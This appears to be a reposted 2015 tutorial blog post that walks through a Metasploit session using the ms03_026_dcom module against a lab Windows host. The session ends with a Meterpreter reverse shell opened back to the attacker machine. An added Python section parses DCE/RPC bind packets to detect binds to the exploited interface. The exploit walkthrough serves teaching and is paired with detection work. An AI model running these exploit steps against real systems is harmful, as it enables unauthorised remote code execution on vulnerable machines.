
Learning Metasploit: ms03_026

Date: 2015-04-25 18:07:46


Point-and-shoot use of ms03_026_dcom:

Matching Modules
================

   Name                                       Disclosure Date  Rank    Description
   ----                                       ---------------  ----    -----------
   auxiliary/scanner/telnet/telnet_ruggedcom                   normal  RuggedCom Telnet Password Generator
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great   MS03-026 Microsoft RPC DCOM Interface Overflow
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good    MS04-031 Microsoft NetDDE Service Overflow
   exploit/windows/smb/psexec_psh             1999-01-01       manual  Microsoft Windows Authenticated Powershell Command Execution


msf > use exploit/windows/dcerpc/ms03_026_dcom // select the exploit module
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5
RHOST => 10.0.0.5
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 10.0.0.100:4444 
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
[*] Sending exploit ...
[*] Sending stage (770048 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800

meterpreter >       // Success!
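
The log above shows the module binding to interface 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 over ncacn_ip_tcp on port 135 before the exploit is sent. The following is an added example, not part of the original post: a parser that pulls the interface UUIDs out of a DCE/RPC bind PDU so a sensor can flag binds to that interface. The function names and the sample PDU are constructed for illustration.

```python
import struct
import uuid

# Interface UUID copied from the "Binding to ..." lines in the log above.
WATCHED_IF = uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57")
PTYPE_BIND = 11  # DCE/RPC connection-oriented "bind" PDU type


def bind_interfaces(payload: bytes):
    """Return the abstract-syntax (interface) UUIDs offered in a DCE/RPC v5
    bind PDU, or [] if the payload is not a bind."""
    if len(payload) < 28 or payload[0] != 5 or payload[2] != PTYPE_BIND:
        return []
    # packed_drep[0] high nibble: 1 = little-endian integers, 0 = big-endian
    little = (payload[4] >> 4) == 1
    end = "<" if little else ">"
    frag_len = struct.unpack_from(end + "H", payload, 8)[0]
    data = payload[:min(frag_len, len(payload))]
    n_ctx, off, found = data[24], 28, []
    for _ in range(n_ctx):
        if off + 24 > len(data):
            return found  # truncated context list: keep what parsed cleanly
        n_syn = data[off + 2]  # number of transfer syntaxes in this context
        raw = data[off + 4:off + 20]
        found.append(uuid.UUID(bytes_le=raw) if little else uuid.UUID(bytes=raw))
        off += 24 + 20 * n_syn  # context header + interface id, then syntaxes
    return found


def is_watched_bind(payload: bytes) -> bool:
    """True if any presentation context binds to the watched interface."""
    return WATCHED_IF in bind_interfaces(payload)


def build_sample_bind(if_uuid: uuid.UUID) -> bytes:
    """Constructed test input: minimal little-endian bind with one context."""
    ndr = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")  # NDR transfer syntax
    ctx = struct.pack("<HBB", 0, 1, 0) + if_uuid.bytes_le + struct.pack("<HH", 0, 0)
    ctx += ndr.bytes_le + struct.pack("<I", 2)
    body = struct.pack("<HHI", 5840, 5840, 0) + struct.pack("<BBH", 1, 0, 0) + ctx
    hdr = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 3, b"\x10\0\0\0",
                      16 + len(body), 0, 1)
    return hdr + body
```

A bind on its own is not proof of exploitation; treat a hit as a signal when it crosses a boundary where port 135 should not be reachable.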

 


Original source: http://www.cnblogs.com/iDerr/p/4456222.html
